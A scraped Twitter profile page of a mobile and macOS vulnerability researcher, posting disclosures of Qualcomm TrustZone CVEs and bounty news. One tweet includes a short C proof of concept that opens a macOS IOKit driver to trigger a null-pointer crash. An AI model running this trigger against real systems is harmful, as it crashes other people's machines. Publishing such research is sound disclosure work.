Arash Tohidi

@H4UL4

Computing offsets for {some} OEMs. Vulnerability research on Android, MacOS, and whatever runs on native code.

Helsinki, Finland
Vrijeme pridruživanja: srpanj 2018.

Tweetovi

Blokirali ste korisnika/cu @H4UL4

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @H4UL4

  1. proslijedio/la je Tweet
    28. pro 2019.

    ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ 99%

    Poništi
  2. 27. pro 2019.

    A very dumb null-ptr dereference in MacOS 10.15 -> 10.15.2

    Poništi
  3. 27. pro 2019.

    <IOKit/IOKitLib.h> int main(void) { CFMutableDictionaryRef d = IOServiceMatching("EndpointSecurityDriver"); io_service_t srv = IOServiceGetMatchingService(kIOMasterPortDefault, d); io_connect_t con; IOServiceOpen(srv, mach_task_self(), 0x41, &con); return 0; }

    Poništi
  4. proslijedio/la je Tweet
    20. pro 2019.

    Science fact of the day: nobody has ever learned C++.

    Poništi
  5. proslijedio/la je Tweet

    You can kiss yourself in the mirror, but only on the lips.

    Poništi
  6. proslijedio/la je Tweet

    I guess this is what advisories are going to look like in 2020?

    Poništi
  7. 2. pro 2019.

    Continuing the chain of disclosures, CVE-2019-14043 Controlled OOB RW present in Qualcomm Fingerprint TA due to insufficient memory input handling. Follow the cmd handler and take a look at QFP_ExecCalibAndTest(). The OOB read was rated as Medium and the OOB write as High.

    Poništi
  8. 26. stu 2019.

    Disclosing CVE-2019-14042: Multiple OOB Reads in Qualcomm Fingerprint TA. I found these in SDM845 & reported them to QPSI 5 months ago. Still unpatched.Their security impact rated as MEDIUM by QPSI. Follow the TA's cmd handling routine and take a look at exec_open_framework().

    Poništi
  9. 23. stu 2019.

    Just got an email from about a reward for a bug I reported a year ago!

    Poništi
  10. 22. stu 2019.

    These bugs are rated as HIGH impact by Qualcomm Product Security.

    Prikaži ovu nit
    Poništi
  11. 22. stu 2019.

    If you're interested to see the bugs yourself, the bugs are in the command handling function which accepts command and response buffers but fails to validate them correctly.

    Prikaži ovu nit
    Poništi
  12. 22. stu 2019.

    Disclosing CVE-2019-14009: Multiple Memory Corruptions in QPAY TrustZone application found in SDM845. Found and reported to QPSI 6 months ago. Patches have been sent to OEMs by Qualcomm but not yet released.

    Prikaži ovu nit
    Poništi
  13. 30. lis 2019.

    Haven't had time to work more on Apple products recently, but here's a new one...

    Poništi
  14. 26. lis 2019.

    There are usually 2 things politicians use as arguments against things they don't like: 1. Patriotism, nationalism or what we can call "hiding behind the flag" 2. Inapplicable, irrelevant morality concerns & cherry picking Subject being cannabis, immigration, war, minorities...

    Prikaži ovu nit
    Poništi
  15. 30. kol 2019.

    There are also couple of new TZ bugs (1 duplicate High impact and 2 Medium impact survivors) which hopefully will be addressed in 3 months. These are completely different bugs than the ones I reported to Google 2 months ago. Details of all will come after the fixes.

    Prikaži ovu nit
    Poništi
  16. 30. kol 2019.

    Just got the second 5k bounty from QC for a baseband bug which survived the bounty policies and the chance of being a duplicate. Although have been quite overwhelmed with work recently. Have to take a small break soon.

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    23. kol 2019.

    Security Research vs Software Development

    Poništi
  18. 31. srp 2019.

    Finally one of the vendors accepted responsibility of fixing and pushing the updates. Will keep you updated upon release.

    Poništi
  19. 31. srp 2019.

    I have to skip this option because of some NDA's that I have signed. I will push more to force the vendors to fix and release an update.

    Prikaži ovu nit
    Poništi
  20. 30. srp 2019.

    I have found a number of vulns in a widely used product which I have tried to report to the vendor. But there is no communication line with this vendor for fixing vulns. The OEMs who use this product just refer me to another OEM. Hence, we might have to go public. Stay tuned.

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·